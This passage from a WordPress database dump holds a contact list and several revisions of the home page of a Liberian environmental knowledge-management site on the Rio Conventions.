FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-16 20:03:55','2019-11-16 20:03:55','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2531,1,'2019-11-16 20:19:45','2019-11-16 20:19:45','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-16 20:19:45','2019-11-16 20:19:45','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2532,1,'2019-11-16 20:21:20','2019-11-16 20:21:20','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-16 20:21:20','2019-11-16 20:21:20','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2533,1,'2019-11-16 20:26:28','2019-11-16 20:26:28','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-16 20:26:28','2019-11-16 20:26:28','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2534,1,'2019-11-16 20:30:28','2019-11-16 20:30:28','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-16 20:30:28','2019-11-16 20:30:28','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2536,1,'2019-11-16 20:34:01','2019-11-16 20:34:01','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-16 20:34:01','2019-11-16 20:34:01','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2537,1,'2019-11-16 20:35:10','2019-11-16 20:35:10','<h2>Welcome to the EKMS</h2>\nThe EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.\n\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\">\n<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\">\n<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\">\n<select name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\"jet_ajax_search_categories_f4a4a39\" class=\"jet-ajax-search__categories-select\">\n<option value=\"0\" selected=\"selected\">Entire Resource</option>\n<option value=\"76\">Case Studies</option>\n<option value=\"78\">Conventions</option>\n<option value=\"79\">Factsheets</option>\n<option value=\"161\">Guidelines</option>\n<option value=\"82\">Leaflets</option>\n<option value=\"84\">Newsletters</option>\n<option value=\"85\">Policies</option>\n<option value=\"86\">Reports</option>\n<option value=\"88\">Strategy and Action Plans</option>\n<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form><button> Results</button>\n<button>See all results</button>\n<h1>Knowledge Resources</h1>\n\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\"&gt;\nLocal Communities and Indigenous People\n<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\nLand and Climate\n<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\nForest Biodiversity\n<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\nInland Waters Biodiversity\n<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\nMarine and Coastal Biodiversity\n<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\nExplore All Topics\n</a>\n<h2>Explore by Institution</h2>\nExplore Government and Other Institutions that have direct linkages with environmental policies and development.\n<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\nExplore By Insitution\n</a>\n<h2>Explore by Document</h2>\nExplore the EKMS Document Database.\n<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\nExplore All Documents\n</a>\n<h1>Multilateral Environmental Agreements</h1>\n<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption>\n<h6>UNCBD</h6>\nThe United Nations Convention on Biological Diversity\n\n</figcaption></a></figure>\n<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\">\n\n<figcaption>\n<h6>UNFCCC</h6>\nThe United Nations Framework Convention on Climate Change\n\n</figcaption>\n</a><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"></a></figure>\n<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\">\n\n<figcaption>\n<h6>UNCCD</h6>\nThe United Nations Convention to Combat Desertification\n\n</figcaption>\n</a><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"></a></figure>\n<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\nView All Agreements\n</a>\n<h3>\n						Start Contributing to the EKMS</h3>\nDoes your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n<a href=\"https://ekmsliberia.info/contribute/\">\nJoin the team\n</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-16 20:35:10','2019-11-16 20:35:10','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2538,1,'2019-11-16 20:37:44','2019-11-16 20:37:44','<h2>Welcome to the EKMS</h2>		